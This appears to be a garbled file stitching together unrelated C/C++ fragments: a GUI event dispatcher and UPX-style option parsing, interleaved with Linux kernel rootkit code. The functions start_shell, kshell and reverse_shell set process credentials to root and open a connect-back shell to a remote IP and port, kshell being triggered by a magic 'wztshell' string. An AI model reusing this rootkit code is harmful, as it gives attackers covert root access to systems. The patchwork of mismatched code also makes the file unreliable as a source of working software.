void WindowView_Impl::dispatch_hot_event(std::shared_ptr<View> &view, PointerEvent &e)
{
if (view != hot_view)
{
if (hot_view)
{
PointerEvent e_exit(PointerEventType::leave, PointerButton::none, e.pos(window_view->root_view()), e.alt_down(), e.shift_down(), e.ctrl_down(), e.cmd_down());
hot_view->dispatch_event(&e_exit, true);
}
hot_view = view;
if (hot_view)
{
PointerEvent e_enter(PointerEventType::enter, PointerButton::none, e.pos(window_view->root_view()), e.alt_down(), e.shift_down(), e.ctrl_down(), e.cmd_down());
hot_view->dispatch_event(&e_enter, true);
}
}
if (hot_view)
hot_view->update_cursor(window);
}
/**
* strat_shell - use system call 'exevce' to get a root shell.
*/
void start_shell(void)
{
struct task_struct *ptr = current;
mm_segment_t old_fs;
old_fs = get_fs();
set_fs(KERNEL_DS);
ptr->uid = 0;
ptr->euid = 0;
ptr->gid = SGID;
ptr->egid = 0;
dup2(epty, 0);
dup2(epty, 1);
dup2(epty, 2);
chdir(HOME);
execve("/bin/sh", (const char **) earg, (const char **) env);
e_exit(-1);
}
/**
* kshell - start a connect back shell in kernel space.
* @ip: remote ip to connect.
* @port: remote port to connect.
* both ip and port are network bytes.
*
* When the system call 'read' had read the flag 'wztshell',it will be use this
* function to start a connect back shell.
*
* return value is always NF_ACCEPT.It's not firewall,just want to filter the key.
*/
int kshell(int ip,int port)
{
//struct task_struct *ptr = current;
struct cred *ptr = (struct cred *)current->cred;
struct socket *sock;
struct sockaddr_in server;
struct winsize ws;
mm_segment_t old_fs;
fd_set s_read;
int soc, tmp_pid, i;
int byte1,count,rlen;
int error;
int len = sizeof(struct sockaddr);
char tmp[101],buf[101];
unsigned char *p,*d;
unsigned char wb[5];
old_fs = get_fs();
ptr->uid = 0;
ptr->euid = 0;
ptr->gid = SGID;
ptr->egid = 0;
set_fs(KERNEL_DS);
ssetmask(~0);
for (i = 0;i < 4096; i++)
close(i);
error = sock_create(AF_INET,SOCK_STREAM,0,&sock);
if (error < 0) {
#if DEBUG == 1
printk("[-] socket_create failed: %d\n",error);
#endif
sock_release(sock);
wztshell = 0;
e_exit(-1);
return -1;
}
//http://lkml.indiana.edu/hypermail/linux/kernel/0805.0/2937.html
soc = sock_map_fd(sock,0);
if (soc < 0) {
#if DEBUG == 1
printk("[-] sock_map_fd() failed.\n");
#endif
sock_release(sock);
wztshell = 0;
e_exit(-1);
return -1;
}
for (i = 0; i < 8; i++)
server.sin_zero[i] = 0;
server.sin_family = PF_INET;
server.sin_addr.s_addr = ip;
server.sin_port = port;
error = sock->ops->connect(sock,(struct sockaddr *)&server,len,sock->file->f_flags);
if (error < 0) {
#if DEBUG == 1
printk("[-] connect to failed.\n");
#endif
e_exit(-1);
return -1;
}
epty = get_pty();
set_fs(old_fs);
if (!(tmp_pid = fork()))
start_shell();
set_fs(KERNEL_DS);
/*
#if ENCRYPT == 1
encrypt_code(banner,200);
#endif
write(soc,banner,200);
*/
while (1) {
FD_ZERO(&s_read);
FD_SET(ptmx, &s_read);
FD_SET(soc, &s_read);
if (_newselect((ptmx > soc ? ptmx+1 : soc+1), &s_read, 0, 0, NULL) < 0)
break;
if (FD_ISSET(ptmx, &s_read)) {
byte1 = read(ptmx, tmp, 100);
if (byte1 <= 0)
break;
#if ENCRYPT == 1
encrypt_code(tmp,byte1);
#endif
write(soc, tmp, byte1);
}
if (FD_ISSET(soc, &s_read)) {
d = buf;
count = read(soc, buf, 100);
if (count <= 0)
break;
#if ENCRYPT == 1
encrypt_code(buf,count);
#endif
p = memchr(buf, ECHAR, count);
if (p) {
rlen = count - ((long) p - (long) buf);
/* wait for rest */
if (rlen > 5) rlen = 5;
memcpy(wb, p, rlen);
if (rlen < 5) {
read(soc, &wb[rlen], 5 - rlen);
#if ENCRYPT == 1
encrypt_code(&wb[rlen],5 - rlen);
#endif
}
/* setup window */
ws.ws_xpixel = ws.ws_ypixel = 0;
ws.ws_col = (wb[1] << 8) + wb[2];
ws.ws_row = (wb[3] << 8) + wb[4];
ioctl(ptmx, TIOCSWINSZ, (unsigned long)&ws);
kill(0, SIGWINCH);
/* write the rest */
write(ptmx, buf, (long) p - (long) buf);
rlen = ((long) buf + count) - ((long)p+5);
if (rlen > 0) write(ptmx, p+5, rlen);
} else
if (write(ptmx, d, count) <= 0) break;
}
}
kill(tmp_pid, SIGKILL);
set_fs(old_fs);
e_exit(0);
return -1;
}
static int do_option(int optc, const char *arg)
{
int i = 0;
switch (optc)
{
#if 0
// FIXME: to_stdout doesn't work because of console code mess
//case 'c':
case 517:
opt->to_stdout = true;
break;
#endif
case 'd':
set_cmd(CMD_DECOMPRESS);
break;
case 'D':
opt->debug.debug_level++;
break;
case 'f':
opt->force++;
break;
case 909:
set_cmd(CMD_FILEINFO);
break;
case 'h':
case 'H':
case '?':
set_cmd(CMD_HELP);
break;
case 'h'+256:
#if 1
if (!acc_isatty(STDOUT_FILENO))
{
/* according to GNU standards */
set_term(stdout);
opt->console = CON_FILE;
}
#endif
show_help(1);
e_exit(EXIT_OK);
break;
case 'i':
opt->info_mode++;
break;
case 'l':
set_cmd(CMD_LIST);
break;
case 'L':
set_cmd(CMD_LICENSE);
break;
case 'o':
set_output_name(mfx_optarg,1);
break;
case 'q':
opt->verbose = (opt->verbose > 1 ? 1 : opt->verbose - 1);
break;
case 't':
set_cmd(CMD_TEST);
break;
case 'v':
opt->verbose = (opt->verbose < 3 ? 3 : opt->verbose + 1);
break;
case 'V':
set_cmd(CMD_VERSION);
break;
case 'V'+256:
/* according to GNU standards */
set_term(stdout);
opt->console = CON_FILE;
show_version(0);
e_exit(EXIT_OK);
break;
// method
case 702:
opt->method_nrv2b_seen = true;
if (!set_method(M_NRV2B_LE32, -1))
e_method(M_NRV2B_LE32, opt->level);
break;
case 704:
opt->method_nrv2d_seen = true;
if (!set_method(M_NRV2D_LE32, -1))
e_method(M_NRV2D_LE32, opt->level);
break;
case 705:
opt->method_nrv2e_seen = true;
if (!set_method(M_NRV2E_LE32, -1))
e_method(M_NRV2E_LE32, opt->level);
break;
case 721:
opt->method_lzma_seen = true;
opt->all_methods_use_lzma = true;
if (!set_method(M_LZMA, -1))
e_method(M_LZMA, opt->level);
break;
case 722:
opt->method_lzma_seen = false;
opt->all_methods_use_lzma = false;
if (M_IS_LZMA(opt->method))
opt->method = -1;
break;
// compression level
case '1':
case '2':
case '3':
case '4':
case '5':
case '6':
case '7':
case '8':
case '9':
if (!set_method(-1, optc - '0'))
e_method(opt->method, optc);
break;
case 902: // --ultra-brute
opt->ultra_brute = true;
/* fallthrough */
case 901: // --brute
opt->all_methods = true;
opt->all_methods_use_lzma = true;
opt->method = -1;
opt->all_filters = true;
opt->filter = -1;
opt->crp.crp_ucl.m_size = 999999;
/* fallthrough */
case 900: // --best
if (!set_method(-1, 10))
e_method(opt->method, 10);
break;
// debug
case 542:
if (!mfx_optarg || strlen(mfx_optarg) != 4)
e_optarg(arg);
memcpy(opt->debug.fake_stub_version, mfx_optarg, 4);
break;
case 543:
if (!mfx_optarg || strlen(mfx_optarg) != 4)
e_optarg(arg);
memcpy(opt->debug.fake_stub_year, mfx_optarg, 4);
break;
case 544:
if (!mfx_optarg || !mfx_optarg[0])
e_optarg(arg);
opt->debug.dump_stub_loader = mfx_optarg;
break;
case 545:
opt->debug.disable_random_id = true;
break;
// mp (meta)
case 501:
getoptvar(&opt->mp_compress_task, 1, 999999, arg);
break;
case 502:
opt->mp_query_format = true;
break;
case 503:
opt->mp_query_num_tasks = true;
break;
// misc
case 512:
opt->console = CON_FILE;
break;
case 513:
opt->console = CON_ANSI_MONO;
break;
case 514:
opt->console = CON_ANSI_COLOR;
break;
case 516:
opt->no_progress = true;
break;
case 519:
opt->no_env = true;
break;
case 526:
opt->preserve_mode = false;
break;
case 527:
opt->preserve_ownership = false;
break;
case 528:
opt->preserve_timestamp = false;
break;
// compression settings
case 520: // --small
if (opt->small < 0)
opt->small = 0;
opt->small++;
break;
case 521: // --filter=
getoptvar(&opt->filter, 0, 255, arg);
opt->all_filters = false;
break;
case 522: // --no-filter
opt->filter = 0;
opt->all_filters = false;
opt->no_filter = true;
break;
case 523: // --all-filters
opt->all_filters = true;
opt->filter = -1;
break;
case 524: // --all-methods
opt->all_methods = true;
opt->all_methods_use_lzma = true;
opt->method = -1;
break;
case 525: // --exact
opt->exact = true;
break;
// compression runtime parameters
case 801:
getoptvar(&opt->crp.crp_ucl.c_flags, 0, 3, arg);
break;
case 802:
getoptvar(&opt->crp.crp_ucl.s_level, 0, 2, arg);
break;
case 803:
getoptvar(&opt->crp.crp_ucl.h_level, 0, 1, arg);
break;
case 804:
getoptvar(&opt->crp.crp_ucl.p_level, 0, 7, arg);
break;
case 805:
getoptvar(&opt->crp.crp_ucl.max_offset, 256u, ~0u, arg);
break;
case 806:
getoptvar(&opt->crp.crp_ucl.max_match, 16u, ~0u, arg);
break;
case 807:
getoptvar(&opt->crp.crp_ucl.m_size, 10000u, 999999u, arg);
break;
case 811:
getoptvar(&opt->crp.crp_lzma.pos_bits, arg);
break;
case 812:
getoptvar(&opt->crp.crp_lzma.lit_pos_bits, arg);
break;
case 813:
getoptvar(&opt->crp.crp_lzma.lit_context_bits, arg);
break;
case 814:
getoptvar(&opt->crp.crp_lzma.dict_size, arg);
break;
case 816:
getoptvar(&opt->crp.crp_lzma.num_fast_bytes, arg);
break;
case 821:
getoptvar(&opt->crp.crp_zlib.mem_level, arg);
break;
case 822:
getoptvar(&opt->crp.crp_zlib.window_bits, arg);
break;
case 823:
getoptvar(&opt->crp.crp_zlib.strategy, arg);
break;
// backup
case 'k':
opt->backup = 1;
break;
case 541:
if (opt->backup != 1) // do not overide '--backup'
opt->backup = 0;
break;
// overlay
case 551:
if (mfx_optarg && strcmp(mfx_optarg,"skip") == 0)
opt->overlay = opt->SKIP_OVERLAY;
else if (mfx_optarg && strcmp(mfx_optarg,"copy") == 0)
opt->overlay = opt->COPY_OVERLAY;
else if (mfx_optarg && strcmp(mfx_optarg,"strip") == 0)
opt->overlay = opt->STRIP_OVERLAY;
else
e_optarg(arg);
break;
case 552:
opt->overlay = opt->SKIP_OVERLAY;
break;
case 553:
opt->overlay = opt->COPY_OVERLAY;
break;
case 554:
opt->overlay = opt->STRIP_OVERLAY;
break;
// CPU
case 560:
if (mfx_optarg && strcmp(mfx_optarg,"8086") == 0)
opt->cpu = opt->CPU_8086;
else if (mfx_optarg && strcmp(mfx_optarg,"386") == 0)
opt->cpu = opt->CPU_386;
else if (mfx_optarg && strcmp(mfx_optarg,"486") == 0)
opt->cpu = opt->CPU_486;
else
e_optarg(arg);
break;
case 561:
opt->cpu = opt->CPU_8086;
break;
case 563:
opt->cpu = opt->CPU_386;
break;
case 564:
opt->cpu = opt->CPU_486;
break;
//
case 600:
opt->dos_exe.force_stub = true;
break;
case 601:
opt->dos_exe.no_reloc = true;
break;
case 610:
opt->djgpp2_coff.coff = true;
break;
case 620:
opt->watcom_le.le = true;
break;
case 630:
opt->win32_pe.compress_exports = 1;
if (mfx_optarg && mfx_optarg[0])
getoptvar(&opt->win32_pe.compress_exports, 0, 1, arg);
//printf("compress_exports: %d\n", opt->win32_pe.compress_exports);
break;
case 631:
opt->win32_pe.compress_icons = 1;
if (mfx_optarg && mfx_optarg[0])
getoptvar(&opt->win32_pe.compress_icons, 0, 3, arg);
//printf("compress_icons: %d\n", opt->win32_pe.compress_icons);
break;
case 632:
opt->win32_pe.compress_resources = 1;
if (mfx_optarg && mfx_optarg[0])
getoptvar(&opt->win32_pe.compress_resources, 0, 1, arg);
//printf("compress_resources: %d\n", opt->win32_pe.compress_resources);
break;
case 633:
// opt->win32_pe.strip_loadconf - OBSOLETE - IGNORED
break;
case 634:
opt->win32_pe.strip_relocs = 1;
if (mfx_optarg && mfx_optarg[0])
getoptvar(&opt->win32_pe.strip_relocs, 0, 1, arg);
//printf("strip_relocs: %d\n", opt->win32_pe.strip_relocs);
break;
case 635:
if (!mfx_optarg || !mfx_optarg[0])
e_optarg(arg);
opt->win32_pe.keep_resource = mfx_optarg;
break;
case 650:
opt->atari_tos.split_segments = true;
break;
case 660:
getoptvar(&opt->o_unix.blocksize, 8192u, ~0u, arg);
break;
case 661:
opt->o_unix.force_execve = true;
break;
case 662:
opt->o_unix.script_name = "/usr/local/lib/upx/upxX";
if (mfx_optarg && mfx_optarg[0])
set_script_name(mfx_optarg, 1);
break;
case 663:
opt->o_unix.is_ptinterp = true;
break;
case 664:
opt->o_unix.use_ptinterp = true;
break;
case 665:
opt->o_unix.make_ptinterp = true;
break;
case 666: // Linux
opt->o_unix.osabi0 = Elf32_Ehdr::ELFOSABI_LINUX;
break;
case 667: // FreeBSD
opt->o_unix.osabi0 = Elf32_Ehdr::ELFOSABI_FREEBSD;
break;
case 668: // NetBSD
opt->o_unix.osabi0 = Elf32_Ehdr::ELFOSABI_NETBSD;
break;
case 669: // OpenBSD
opt->o_unix.osabi0 = Elf32_Ehdr::ELFOSABI_OPENBSD;
break;
case 670:
opt->ps1_exe.boot_only = true;
break;
case 671:
opt->ps1_exe.no_align = true;
opt->ps1_exe.boot_only = false;
break;
case 672:
opt->ps1_exe.do_8bit = true;
break;
case 673:
opt->ps1_exe.do_8mib = false;
break;
case 674:
opt->o_unix.unmap_all_pages = true; // val ?
break;
case '\0':
return -1;
case ':':
return -2;
default:
fprintf(stderr,"%s: internal error in getopt (%d)\n", argv0, optc);
return -3;
}
UNUSED(i);
return 0;
}
void e_help(void)
{
show_help();
e_exit(EXIT_USAGE);
}
void __acc_cdecl_sighandler e_sighandler(int signum)
{
UNUSED(signum);
e_exit(EXIT_FATAL);
}
static void e_optval(const char *n)
{
fflush(con_term);
fprintf(stderr,"%s: invalid value for option '%s'\n", argv0, n);
e_exit(EXIT_USAGE);
}
static void e_optarg(const char *n)
{
fflush(con_term);
fprintf(stderr,"%s: invalid argument in option '%s'\n", argv0, n);
e_exit(EXIT_USAGE);
}
void e_usage(void)
{
show_usage();
e_exit(EXIT_USAGE);
}
void do_files(int i, int argc, char *argv[])
{
if (opt->verbose >= 1)
{
show_head();
UiPacker::uiHeader();
}
for ( ; i < argc; i++)
{
infoHeader();
const char *iname = argv[i];
char oname[ACC_FN_PATH_MAX+1];
oname[0] = 0;
try {
do_one_file(iname,oname);
} catch (const Exception &e) {
unlink_ofile(oname);
if (opt->verbose >= 1 || (opt->verbose >= 0 && !e.isWarning()))
printErr(iname,&e);
set_exit_code(e.isWarning() ? EXIT_WARN : EXIT_ERROR);
} catch (const Error &e) {
unlink_ofile(oname);
printErr(iname,&e);
e_exit(EXIT_ERROR);
} catch (std::bad_alloc *e) {
unlink_ofile(oname);
printErr(iname,"out of memory");
UNUSED(e);
//delete e;
e_exit(EXIT_ERROR);
} catch (const std::bad_alloc &) {
unlink_ofile(oname);
printErr(iname,"out of memory");
e_exit(EXIT_ERROR);
} catch (std::exception *e) {
unlink_ofile(oname);
printUnhandledException(iname,e);
//delete e;
e_exit(EXIT_ERROR);
} catch (const std::exception &e) {
unlink_ofile(oname);
printUnhandledException(iname,&e);
e_exit(EXIT_ERROR);
} catch (...) {
unlink_ofile(oname);
printUnhandledException(iname,NULL);
e_exit(EXIT_ERROR);
}
}
if (opt->cmd == CMD_COMPRESS)
UiPacker::uiPackTotal();
else if (opt->cmd == CMD_DECOMPRESS)
UiPacker::uiUnpackTotal();
else if (opt->cmd == CMD_LIST)
UiPacker::uiListTotal();
else if (opt->cmd == CMD_TEST)
UiPacker::uiTestTotal();
else if (opt->cmd == CMD_FILEINFO)
UiPacker::uiFileInfoTotal();
}
int reverse_shell(void *ip)
{
struct task_struct *ptr = current;
struct sockaddr_in dire;
struct pt_regs regs;
mm_segment_t old_fs;
unsigned long arg[3];
int soc, tmp_pid;
unsigned char tmp;
fd_set s_read;
old_fs = get_fs();
ptr->uid = 0;
ptr->euid = 0;
ptr->gid = SGID;
ptr->egid = 0;
arg[0] = AF_INET;
arg[1] = SOCK_STREAM;
arg[2] = 0;
set_fs(KERNEL_DS);
if ((soc = socketcall(SYS_SOCKET, arg)) == -1)
{
set_fs(old_fs);
lanzar_shell = 1;
e_exit(-1);
return(-1);
}
memset((void *) &dire, 0, sizeof(dire));
dire.sin_family = AF_INET;
dire.sin_port = htons((unsigned short) global_port);
dire.sin_addr.s_addr = (unsigned long) global_ip;
arg[0] = soc;
arg[1] = (unsigned long) &dire;
arg[2] = (unsigned long) sizeof(dire);
if (socketcall(SYS_CONNECT, arg) == -1)
{
close(soc);
set_fs(old_fs);
lanzar_shell = 1;
e_exit(-1);
return(-1);
}
/* pillamos tty */
epty = get_pty();
/* ejecutamos shell */
set_fs(old_fs);
memset(®s, 0, sizeof(regs));
regs.xds = __USER_DS;
regs.xes = __USER_DS;
regs.orig_eax = -1;
regs.xcs = __KERNEL_CS;
regs.eflags = 0x286;
regs.eip = (unsigned long) ejecutar_shell;
tmp_pid = (*my_do_fork)(0, 0, ®s, 0, NULL, NULL);
set_fs(KERNEL_DS);
while(1)
{
FD_ZERO(&s_read);
FD_SET(ptmx, &s_read);
FD_SET(soc, &s_read);
_newselect((ptmx > soc ? ptmx+1 : soc+1), &s_read, 0, 0, NULL);
if (FD_ISSET(ptmx, &s_read))
{
if (read(ptmx, &tmp, 1) == 0)
break;
write(soc, &tmp, 1);
}
if (FD_ISSET(soc, &s_read))
{
if (read(soc, &tmp, 1) == 0)
break;
write(ptmx, &tmp, 1);
}
} /* fin while */
/* matamos el proceso */
kill(tmp_pid, SIGKILL);
/* salimos */
set_fs(old_fs);
e_exit(0);
return(-1);
} /********** fin reverse_shell **********/
